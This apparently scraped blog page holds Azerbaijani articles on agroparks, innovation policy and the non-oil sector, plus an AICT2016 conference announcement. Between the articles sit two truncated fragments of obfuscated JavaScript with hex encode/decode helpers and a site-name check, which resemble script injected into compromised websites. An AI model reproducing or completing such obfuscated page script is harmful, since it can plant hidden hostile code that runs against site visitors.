təkmilləşdirilməsi və institusional islahatların sürətləndirilməsi ilə bağlı tədbirlər haqqında” fərmanına əsasən 15 noyabr 2014-cü il tarixində Şəmkir şəhərində ilk aqroparkın təməli atılmışdır. Təməlqoyma mərasimində iştirak edən ölkə başçısına İqtisadiyyat və sənaye naziri Şahin Mustafayev “Aqropark” inkişaf konsepsiyası barədə məlumat vermişdir. “Bildirmişdir ki, bu konsepsiya ölkənin ixrac potensialının artırılmasında və coğrafiyasının genişləndirilməsində, milli brendlərin yaradılmasında, kiçik və orta fermerlərin innovativ qabiliyyətinin artırılmasında, intensiv metodların geniş tətbiqində, kənd təsərrüfatı sahəsində əlaqələndirilmiş vahid sistemin, eləcə də istehsalçı, emalçı və istehlakçı arasında inteqrasiya münasibətlərinin formalaşmasında, yüksək məhsuldarlığın əldə olunmasında, aqrar sahədə ixtisaslı kadrların hazırlanmasında və yeni iş yerlərinin açılmasında əhəmiyyətli rol oynayacaq.”[1. 03.04.2016]. “Şəmkir Aqropark” bir və ya bir neçə növ kənd təsərrüfatı məhsullarının istehsalı, emalı və marketinqi ilə əlaqədar fəaliyyətlərin vahid istehsal məkanında, bir ərazidə kombinə olunmuş təsərrüfatçılıq subyektidir [2. 03.04.2016].

Aqropark

İnformasiyaya malik olmağın əsas güc və gəlir mənbəyi olduğu, rəqabət üstünlüyü əldə etməyin iki əsas üsulundan biri olduğu və əhəmiyyətinin günbəgün artdığını müasir iqtisadiyyat şəraitində təbii olaraq əsas informasiya istehsalçıları olan ali məktəblərin və elmi-tədqiqat institutlarının əhəmiyyəti daha da artmışdır. Aqrar mütəxəssislərin hazırlanması sahəsində Azərbaycanda yeganə ixtisaslaşmış ali təhsil müəssisəsi olan Azərbaycan Dövlət Aqrar Universitetində də son zamanlar ölkədə həyata keçirilən məqsədyönlü tədbirlərdin tərkib hissəsi olaraq: elmi-texniki baza yenilənir, yeni laboratoriyaların, mərkəzlərin yaradılması və təhsilin keyfiyyətinin artırılması istiqamətində uğurlu işlər görülür.

Buna nümunə olaraq Baytarlıq təbabəti və zoomühəndislik fakültəsinin nəz­dində təşkil edilmiş ümumi sahəsi 254  olan “Quşçuluq tədris-təc­rübə mərkəzi” göstərilə bilər. Mərkəzin 200  sahəsində müa­sir tələblərə cavab verən ferma inşa edilmiş, 30 ərazidə laboratoriya yaradılmış və avadanlıqlarla təchiz olun­muşdur. Burada kənd təsərrüfatı quşlarının bəs­lən­məsi, yetişdirilməsi, tələbələrə quşçuluq sahəsində mü­asir texnologiyaların öyrədilməsi, elmi-tədqiqat işlərinin aparılması, zootexniki-baytarlıq tədbirlərinin aparılma qaydaları, müasir diaqnostika üsullarının tətbiqi və s. bu kimi işlər həyata keçi­rilir. Mərkəzdə 30-35 gün ərzində ilk mərhələdə 3000 ədəd və ikinci mərhələdə 1500 ədəd broyler cinsli quş yetiş­diril­mişdir. Mərkəzdə 4 nəfər tələbə işlə təmin edilmişdir [3. 03.04.2016].

Universitetdə quşcuğun inkişafı məqsədilə yaradılmış ikinci mərkəz 2015-ci ildən əsası qoyulan bildirçin yetişdirmə üzrə tədris mərkəzidir.  Mərkəzin əsas məqsədi tələbələrə tədris prosesinin təcrübi hissəsini çatdırmaq və  laboratoriyalar vasitəsilə eksperimental təsərrüfatlarda gələcək peşəsinə dair praktik biliklərlə sahib olmağa imkanın yaradılmasıdır. Bildirçin yetişdirmə üzrə Tədris mərkəzinin işinin əsas istiqaməti intensiv texnologiya əsasında bildirçinlərin bəslənməsi, müasir şəraitdə bildirçinlərin yetişdirilməsində 3 mərtəbəli qəfəsli batareyalardan istifadə etməklə yüksək nəticələrin əldə edilməsidir [3. 03.04.2016].

Bunlardan əlavə universitetdə qapalı və açıq balıq yetişdirmə laboratoriyası, taxıl və paxlalı bitkilər laboratoriyası, alternativ enerji mənbələri üzrə sahə elmi-tədqiqat laboratoriyası, tədris – təcrübə təsərrüfatları, maşın-traktor parkı kimi maddi-texniki vasitə­lərlə təchiz edilmiş mərkəzlər fəaliyyət göstərir. Bütün bu maddi-texniki təchizat və elmi-pedaqoji heyyətin potensialından daha səmərəli istifadə etməklə, istər k

adr hazırlığının keyfiyyətini artırmaq, istərsə də aqrar sahədə fəaliyyət göstərən müəssisə, təşkilat və fərdi təsərrüfatlarla daha yaxşı əlaqələri təmin etmək məqsədilə Azərbaycan Dövlət Aqrar Universitetinin nəzdində aqroparkın təşkil olunması məqsədəuyğun olardı. Qeyd edildiyi kimi bu sahədə qanunvericilik hazırlanmış, Şəmkir şəhərində aqropark təşkil edilmişdir. Bu istiqamətdə dünya təcrübəsini və, bir çox xüsusiyyətlərinə görə Azərbaycana bənzəyən Türkiyə Cümhuriyyətinin də təcrübələrini nəzərə alaraq ən əlverişli coğrafi mövqeyə və təşkilati-idarəetmə strukturuna malik aqroparkın qurulmasının səmərəli olacağını düşünürük.

İstifadə edilən mənbələr.

  1. http://www.president.az/articles/13410
  2. http://ztp.az/about.php
  3. http://adau.edu.az/
Təhmasib Əlizadə. İnnovasiyanın inkişaf etməkdə olan ölkələrin iqtisadi inkişafına təsiri
İnkişaf

İnnovasiya və innovasiya siyasəti haqqında ümumi məlumat

İnnovasiya və innovasiya siyasəti hazırki dövrün ən əsas xüsusiyyətlərindəndir. Çünki ölkələr yenilik, innovasiya tətbiq etmədən nə daxildə uğur qazana bilirlər nə də beynəlxalq səviyyədə. Ona görə də artıq ölkələr davamlı iqtisadi inkişaf əldə etmək üçün elm tutumlu, bilik iqtisadiyyatına keçirklər. Elm tutumlu, bilik iqtisadiyyatında isə araşdırma, innovasiyalar çox önəmlidir.

İnnovasiya ümumi olaraq yenilik deməkdir. Daha ətraflı izah versək, innovasiya yeni və ya inkişaf etdirilmiş məhsulun tətbiqi və ya yeni metodların reallaşdırılması deməkdir. İnnovasiyaya ümumi tərif verdikdən sonra iqtisad elmində innovasiyalara yanaşmalara diqqət yetirək. İnnovasiyanın iqtisad elmində bir anlayış kimi istifadə olunmasında ən əsas rolu Avstriya əsilli Amerikan iqtisadçısı Cosef Şumpeter oynayır. Cosef Şumpeterin “yaradıcı məhvetmə” (“creative destruction”) anlayışı iqtisad elmində innovasiya sahəsində çox mühim yerə sahibdir. C. Şumpeter iddia edir ki, innovasiya texnoloji rəqabətin ən əsas mənbəyidir. Şumpeter Kapitalizm, Sosializm və Demokratiya kitabında innovasiya üçün “yaradıcı məhvetmə” (“creative destruction”) terminini, anlayışını işlədir.

İnnovasiyanın inkişaf etməkdə olan ölkələrin iqtisadi inkişafına təsiri

Əsasən texnoloji sahəyə aid edilən innovasiya siyasəti artıq digər sahələrə də zamanla təsir etməyə başlamışdır. Ölkələr artıq bu istiqamətdə milli innovasiya strategiyaları hazırlayırlar. Bu tədqiqat yazısında araşdırılacaq birinci məqam inkişaf etməkdə olan ölkələrdə innovasiya siyasəti və bu innovasiya siyasətinin həmin ölkələrin iqtisadiyyatına təsiridir. Araşdırmalar onu göstərir ki, İnkişaf etməkdə olan ölkələrdə innovasiya siyasətinin tətbiqi və təkmilləşdirilməsi üçün bir çox istiqamətdə işlər aparılır. Bunun üçün inkişaf etməkdə olan ölkələrdə innovasiyanın təşviqi, tanıdılması çox mühim yer tutur. Ölkələrin əsas məqsədi isə davamlı iqtisadi inkişafı təmin etmək, ölkədə rəqabəti gücləndirmək, rəqabət nəticəsində daha keyfiyyətli və beynəlxalq bazarlara çıxarıla biləcək məhsulların istehsalını yaratmaqdır.

Hazırki dövrdə dünya üzrə innovasiyanın iqtisadi inkişadakı rolu çox böyükdür. Uğurla inkişaf edən ölkələr öz iqtisadiyyatlarında mütləq şəkildə innovasiyanı tətbiq edirlər və innovasiya potensialını artırmaq üçün strategiyalar hazırlayırlar. Və burada ən əsas məqam ondan ibarətdir ki, innovasiya yalnızca yüksək texnoloji məhsulların istehsalında istifadə olunmur, eyni zamanda innovasiyanı bir çox sahələrin inkişafı üçün istifadə etmək mümkündür. İnnovasiyanı tətbiq etməklə ölkələr bütün sahələrdə qarşıya qoyulan hədəflərə çatmaq üçün üstünlük əldə edirlər. Ümumi olaraq, onu qeyd edə bilərik ki, ölkənin innovasiya potensialının olması çox mühimdir və problemlərin həlli prosesində işi sürətləndirir.

İnnovasiyanı uğurla tətbiq edən İnkişaf etməkdə olan ölkələrə misal olaraq Malaziyanı, Türkiyəni, Tailandı və s. misal göstərə bilərik.

Azərbaycan iqtisadiyyatının əsas xüsusiyyəti hələ də hazır məhsula, elm tutumlu məhsula yox, xammala əsaslanmasıdır. Keçən dövr ərzində biz iqtisadiyyatımızda xammal ixracından gəlirlər əldə etmişik. Lakin uzun müddətli dövrdə bunun yaxşı nəticəsi olmayacağı aşkardır. Ona görə də biz artıq zaman itirmədən bilik iqtisadiyyatına, innovasiya tutumlu istehsala, rəqabətqabiliyyətli məhsul istehsalı və ixracına keçməliyik. Bunun üçün isə ən zəruri olan universitet-sənaye əməkdaşlığının gücünü və önəmini artırmaq və innovasiya strategiyası hazırlamaq çox vacibdir. Mən bu tədqiqat yazısında Azərbaycan üçün innovasiya və elm tutumlu siyasətin istiqamətlərini araşdırmışam və inkişaf etməkdə olan ölkə olaraq bizə hansı tip innovasiya siyasətinin, hansı istiqamətlərin vacib olduğunu vurğulamışam. Əvvəldə də qeyd etdiyim kimi bu istiqamətlərdən biri bilik iqtisadiyyatına keçid, digəri isə regional innovasiya planının, strategiyasının tətbiqidir.

Son bir ildə Azərbaycan iqtisadiyyatında baş verən proseslər Bilik İqtisadiyyatına keçidin bizim üçün vacibliyini göstərdi. Əslində Bilik iqtisadiyyatına keçid daima mühim və vacib məsələ olub. İndiki reallıqda isə biz gələcəyimizi təminat almaq üçün heç vaxt itirmədən bilik iqtisadiyyatına keçməliyik. Təbii ki, bu biraz çətin və uzun proses olacaqdır. Lakin hər bir prosesdə olduğu kimi bu prosesində başlanğıc nöqtəsi, inkişaf nöqtəsi vardır.

Biliyə əsaslanan Bilik İqtisadiyyatını yaratmaq üçün isə bizə iki təməl istiqamət gərəkli olacaqdır. Birincisi, təhsilə investisiyaları artırmaq və həmin investisiyaların geri dönüşünü, mənfəətini yüksəltməkdir. İkincisi isə, insan kapitalını yaratmaq və ya var olanı cəlb etmək.

Təhsilə investisiya yatırıldığı zaman biliyin istehsalı baş verəcəkdir. Bilik istehsalını isə ya müstəqil formada fəaliyyət göstərən araşdırma institutları və ya universiterlərlə qarşılıqlı fəaliyyətdə olan araşdırma mərkəzləri, institutları həyata keçirəcəklər. Biliyin istehsalı uzun müddətdə ölkəyə çox böyük gəlir gətirir və ölkədəki həyat standartlarını yüksəldir. Dünya ölkələrindən bunu tətbiq edən kifayət qədər uğurlu ölkələr var. Misal üçün, İsraili, Cənubi Koreyanı, Malasiyanı, Sinqapuru buna misal olaraq göstərə bilərik.

Bilik iqtisadiyyatına keçid mərhəlsində innovasiya siyasətinin əsas addımlarından biri təhsilə böyük həcmdə investisiyanın yatırması və universitetlərin sənaye müəssisələri ilə daha sıx əlaqəsinin qurulmasıdır. İkinci addım olaraq, araşdırma institutlarına böyük həcmdə investisiyalar yatırılmalıdır. Ölkə birbaşa olaraq bu araşdırma institutları maliyyələşdirməlidir və universitetlərlə kooperasiyasını və qarşılıqlı əməkdaşlığını gücləndirməlidir. Üçüncü addım olaraq, özəl sektoru universitetlərlə əməkdaşlığa sövq etmək lazımdır. Çünki bu əməkdaşlıq universitet müəllimlərinin, professorlarının əsil iqtisadi potensialını üzə çıxaracaqdır. Onların özəl sektorla qarşılıqlı əlaqəsi yeni dəyərlərin yaranmasına, daha rəqabətqabiliyyətli məshsulların yaranmasına səbəb olacaqdır. Ölkədə iqtisadi artım baş verəcəkdir.

Biz bugün ölkəmizdə post-neft dövrü üçün təkliflərin hazırlanmasının zəruriliyini və aktuallığını müşahidə edirik. Post-neft dövrü üçün ölkə iqtisadiyyatı bilik yönümlü olmaqla, artıq daha çox rəqabətə ehtiyac duyur. İnnovasiya siyasətinin hissəsi olaraq regionalda bilik mərkəzlərinin və sənaye müəssisələrinin yaradılması və onların əməkdaşlığı Azərbaycan üçün ixtisaslaşmaya çox böyük xeyir verəcək, həmin regionlarda məşğulluğu artıracaqdır, məhsul istehsalında rəqabət yaradacaqdır, regionların ixtisaslaşması nəticəsində həmin regionlara daha çox investisiya cəlb ediləcəkdir. Bunlar isə eyni zamanda digər sahələrin də inkişafı üçün stimuldur.

Təhmasib C. Əlizadə

Azərbaycan Dövlət İqtisad Universiteti (UNEC), Beynəlxalq İqtisadiyyat kafedrası

Qeyri-neft sektorunun inkişafı davamlı inkişaf modelinə keçidin mühüm istiqamətidir
What-is-Industrial-Engineering-8

İnnovativ iqtisadiyyatın formalaşması , yerli resurs və xammalla işləyən və ixrac qabiliyyətli məhsullar istehsal edən muasir sənaye sahələrinin yaradılması  davamlı iqtisadiyyatın inkişafını əsaslandırır. Azərbaycanda son illər davamlı inkişaf xarakteri  almış  qeyri –neft sektorunda  artım  qeydə  alınmışdır.  Ölkəmiz uzun illərdir ki, neft və qaz sənayesinin mühüm inkişaf xüsusiyyətləri  ilə dünya arenasında addımlayır. Həm keçmiş SSRİ tərkibində olan dönəmdə , həm də hal-hazırkı zaman kəsiyində  Azərbaycan neft və qaz hasilatının həcmi ilə diqqət mərkəzində olmuşdur. Ölkəmiz öz iqtisadi siyasətini təkcə neft faktoruna bağlamadan ,digər sahələrin , qeyri neft sektoru sahələrinin inkişafınına yönəltmişdir. Bunu əyani şəkildə müşahidə etmək üçün yaxın illərin statistik məlumatlarına nəzər yetirmək kifayətdir.Son illərdə həyata keçirilən sənayeləşmə tədbirləri çərçivəsində neft-qaz, qızıl və digər hasilat sahələrində əldə edilmiş uğurlarla yanaşı, sənayenin diversifikasiyası genişləndirilmiş, yeni istehsal gücləri istifadəyə verilmiş, müasir texnologiyalara əsaslanan rəqabətqabiliyyətli müəssisələr yaradılmışdırSumqayıt Texnologiyalar Parkının, Alüminium İstehsalı Kompleksinin və Azərbaycan Polad İstehsalı Kompleksinin yaradılması, Bakıda Gəmiqayırma

stp 2zavodunun fəaliyyətə başlaması, Gədəbəy və Daşkəsəndə qızıl-mis emalı zavodlarının qurulması, Sumqayıtda neft-kimya sənayesində modernizasiya işlərinə başlanılması və Karbamid Zavodunun inşası, Qaradağda Sement Zavodunun istehsal gücünün artırılması və yeni zavodun inşası, Qazaxda, Naxçıvanda yeni sement zavodlarının tikilib istifadəyə verilməsi qeyri-neft sənayesinin növbəti mərhələdə daha dərin şaxələndirilməsi üçün geniş imkanlar yaradır. Ötən dövrdə ölkədə qeyri-neft sənayesinin əsas halqalarını formalaşdıran maşınqayırma, avadanlıq istehsalı, cihazqayırma və tikinti materiallarının istehsalı sahələrində yeni rəqabətqabiliyyətli müəssisələr yaradılmış, o cümlədən Gəncədə traktor və kənd təsərrüfatı texnikası, Naxçıvanda avtomobil, Mingəçevirdə elektron avadanlıqlar, Sumqayıtda günəş panellər, Qaradağda metal konstruksiyalar, Hacıqabulda seramik plitələr istehsalı müəssisələri qurulmuşdur.  Qeyri-neft sektorunun inkişafına təkan verən mühüm amillərdən olan metalurgiya sənayesinin inkişafını sürətləndirmək məqsədi ilə , Azərbaycan Polad İstehsalı Kompleksi  QSC-i yaradılmışdır. Ölkədə qeyri-neft sənayesinin inkişafı istiqamətində görülən tədbirlər artıq öz müsbət nəticəsini verməkdədir. Cari ilin birinci yarısında qeyri-neft sektorunda 7 faiz artım qeydə alınıb. Bu da ölkədə həyata keçirilən sənayeləşmə siyasətinin doğruluğunu bir daha təsdiq edir. Ümumiyyətlə, sənayenin inkişafı, xüsusilə ağır sənayenin inkişafı metal təminatından bilavasitə asılıdır. tarktor istehsali

Dünya iqtisadiyyatının qloballaşması fonunda Azərbaycanın iqtisadiyyatının neft amilindən asılılığının azaldılması, qeyri-neft sektorunun inkişafında kompleksliliyin artırılması, dünya iqtisadiyyatına kifayət qədər dərin inteqrasiya olunması, enerji və resurslara qənaət edən ekoloji təmiz texnologiyaların istehsalının stimullaşdırılması, sənayenin ayrı-ayrı sahələrinin bir-biri ilə uzlaşmış şəkildə fəaliyyət göstərməsi diqqət mərkəzində saxlanılmalıdır.

  Azərbaycanda ümumi iqtisadi artımın əsas hissəsi ulu öndər Heydər Əliyevin rəhbərliyi ilə işlənib hazırlanmış neft strategiyasının uğurlu nəticələri hesabına təmin olunsa da , son illər qeyri-neft sektoru üzrə də xüsusi fəallıq nəzərə çarpır. Bu da Azərbaycanın dövlət başçısı İlham Əliyevin rəhbərliyi ilə ölkə iqtisadiyyatının şaxələndirilməsi istiqamətində həyata keçirilən tədbirlərin məntiqi nəticəsidir. Son illər ölkəmizdə  informasiya kommunikasiya texnologiyalarının (İKT) inkişaf etdirilməsi sahəsində də əhəmiyyətli tədbirlər həyata keçirilir.IKT shekil

Qarşıdakı illərdə İKT infrastrukturu inkişaf etdiriləcək, əhaliyə müasir elektron xidmətlərin göstərilməsi imkanları genişləndiriləcək, kənd yaşayış məntəqələri də daxil olmaqla ölkə ərazisində genişzolaqlı, ucuz və keyfiyyətli internetə çıxış təmin ediləcəkdir. Distant təhsil, elektron ticarət, tele-tibb və digər müasir xidmət növlərinin geniş tətbiqinə nail olunacaq, elektron ticarət əqdləri iştirakçılarının müdafiəsini və təhlükəsizliyini təmin etmək üçün qanunvericilik təkmilləşdiriləcəkdir. Bölgələrdə İKTnin tətbiqi genişləndiriləcək, əhalinin rəqəmsal hazırlığı və ölkənin qlobal informasiya məkanına inteqrasiya səviyyəsi yüksəldiləcəkdirSənaye siyasətinin əsas məqsədlərindən biri də sənayenin rəqabət qabiliyyətinin artırılmasına yönəldilmiş tədbirlərin həyata keçirilməsindən ibarətdir. Bu tədbirlər sahəvi araşdırmalar nəticəsində müxtəlif sektorların xüsusiyyətlərinə uyğun olaraq əlavə tədbirlərlə dəstəklənməlidir. Sənayenin rəqabət qabiliyyətinin yüksəldilməsi məqsədi ilə enerji tariflərinin tənzimlənməsində çeviklik artırılmalı, çevik tarif siyasəti əlverişli vergi və gömrük rejimi və çevik məzənnə siyasəti ilə müşayiət edilməlidir. Bununla yanaşı, sənayeyə investisiyaların cəlb edilməsi üçün imkanlar genişləndirilməli, sənayeyə yönləndirilən dövlətin güzəştli kreditlərindən istifadə və lizinq imkanları artırılmalı, qeyri-neft sənayesinə investisiyaların təşviqi mexanizmi yaradılmalıdır. Sənaye müəssisələrinin quruluş xərclərinin azaldılması, sənaye zonalarından (xüsusi iqtisadi zona, sənaye parkı və sənaye məhəllələri) kənarda yerləşən sənaye layihələrinin müəssisədən kənar infrastruktur təminatının yaxşılaşdırılması, bu məqsədlə dövlət vəsaiti hesabına həyata keçirilən infrastruktur layihələrinin özəl sektorun investisiyaları ilə əlaqələndirilməsi mexanizmi qurulmalıdır. Eyni zamanda, bir sıra qabaqcıl ölkələrin təcrübəsindən istifadə edərək dövlət-özəl tərəfdaşlıq modellərinin tətbiqinin genişləndirilməsi diqqət mərkəzində saxlanılmalıdır.

Hazırladı : UNEC-in doktorantı  Quluyev R.M

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “diskurs.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “diskurs.az”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

AİCT2016. Bakıda beynəlxalq WebOfScience elmi bazasına düşmə fürsəti

Sardar2016_19Mart

AICT2016 | 10th IEEE International Conference on Application of Information and Communication Technologies

http://aict.info/2016/#sthash.0KOvPVjg

Hörmətli iqtisadçı və İT sahəsindən olan dostlarımız,

Bu konfransa tesiz verə bilib çap olunsanız WebOfScience elmi bazasına düşəcəksiniz.

Bu da dünyada olan №1 elmi bazadır.

Fürsəti qaçırmayın.

  • Hörmətlə Sərdar Şabanov

P.S. 1)Öz adınızı 2)UNEC-in adını 3) Azərbaycan-ın adını beynəlxalq bazaya sala bilərsiniz.

Hər çap olunmuş məruzə tezisi 1 beynəlxalq yazı deməkdir.

UNEC-in beynəlxalq reytinqinə töhvə verə bilərsinizmi? Çalışsanız olacaq, inşallah.

Alət çubuğuna keç